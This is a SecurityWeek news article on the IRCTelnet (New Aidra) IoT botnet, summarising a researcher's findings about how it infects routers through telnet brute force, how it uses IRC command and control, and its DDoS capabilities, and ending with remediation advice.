Connect with us

Hi, what are you looking for?



DDoS-Capable IRCTelnet IoT Botnet Emerges

A new malware family targeting Internet of Things (IoT) devices to ensnare them into distributed denial of service (DDoS) botnets has emerged.

A new malware family targeting Internet of Things (IoT) devices to ensnare them into distributed denial of service (DDoS) botnets has emerged.

Dubbed Linux/IRCTelnet (New Aidra), the new botnet is built on the core code of Aidra, a previously known IoT malware family designed to launch DDoS attacks. What’s more, the threat shows some similarities with Tsunami/Kaiten (uses the same IRC protocol), with BASHLITE (IRCTelnet uses the same telnet scanner and infection’s injection code as this malware), and with Mirai (uses its leaked credential list).

Targeting routers and modems, the newly spotted malware features encoded command and control (C&C) information, as well as hardcoded Italian language messages in the communication interface, a security researcher going by the name of unixfreaxjp explains. The new botnet can launch DDoS attacks using UDP floods and TCP floods, along with other techniques, and uses both IPv4 and IPv6 protocols.

The security researcher notes that the new piece of malware was observed infecting almost 3,500 hosts within only 5 days after it has been first detected. The malware uses telnet scans and brute force attacks for infection and the first infection campaign was observed on October 25.

After brute-forcing the vulnerable systems, the attacker executes a series of commands, including one to download and install malware, followed by another one to stop the firewall, after which the session is closed. All of these commands are executed in less than a second (the malware download process isn’t counted), the security researcher says.

The threat was observed killing previously running instances of itself and removing previous binaries, if any, as well as downloading the latest available version. The malware’s attack possibilities are limited to already infected devices, because the loader script is actually written in the malware itself, the security researcher explains (the attacker, however, can execute a similar script from their own environment).

The malware is believed to target devices running operating systems that are compatible with Linux kernel 2.6.x (2.6.32 or above). The attack chain, the researcher says, includes checking fork and PID beforehand, getting the uname data of the compromised system, loading the encoded C&C data and decoding it, sending a request to C&C to get GeoIP, reversing the GeoIP strings for BotID, connecting to IRC C&C server using “d3x” if uname isn’t available, starting the IRC connection, and listening for commands.

Advertisement. Scroll to continue reading.

The malware’s code doesn’t show persistence efforts, but that doesn’t come as a surprise, given that it targets IoT devices, the security researcher says. However, the code does show the hardcoded username and password combinations.

The malware communicates with the C&C server using the IRC protocol, and a series of server-to-client commands is used to trigger malicious functions. The researcher found that around 3,400 users were connected via IRC, suggesting that this would be the number of infected clients so far, but also says that intense scanning for vulnerable devices was observed.

Because of the Italian messages spotted in the botnet’s communication patterns, the security researcher says that the actor behind this piece of malware might be an Italian speaker. In fact, the researcher suggests that the actor might be “a known Italian hacker under handle: d3m0n3 or eVil (d4rk3v1l).”

The botnet shows a variety of DDoS capabilities using both IPv4 and IPv6 packets, based on the attack generator functions sendV4() and sendV6() found in the code. However, because the threat doesn’t pack a persistence mechanism or rootkit, the infection can be easily removed by restarting the device. However, users should also secure the telnet in addition to rebooting the device, otherwise the infection will reoccur.

Related: DDoS Attacks Are Primary Purpose of IoT Malware

Related: Mirai Botnet Infects Devices in 164 Countries

Related: Mirai Botnets Used for DDoS Attacks on Dyn

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join security experts as they discuss ZTNA’s untapped potential to both reduce cyber risk and empower the business.


Join Microsoft and Finite State for a webinar that will introduce a new strategy for securing the software supply chain.


Expert Insights

Related Content


Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Data Breaches

OpenAI has confirmed a ChatGPT data breach on the same day a security firm reported seeing the use of a component affected by an...

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...

IoT Security

A group of seven security researchers have discovered numerous vulnerabilities in vehicles from 16 car makers, including bugs that allowed them to control car...


The latest Chrome update brings patches for eight vulnerabilities, including seven reported by external researchers.


Patch Tuesday: Microsoft warns vulnerability (CVE-2023-23397) could lead to exploitation before an email is viewed in the Preview Pane.


A researcher at IOActive discovered that home security systems from SimpliSafe are plagued by a vulnerability that allows tech savvy burglars to remotely disable...


Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.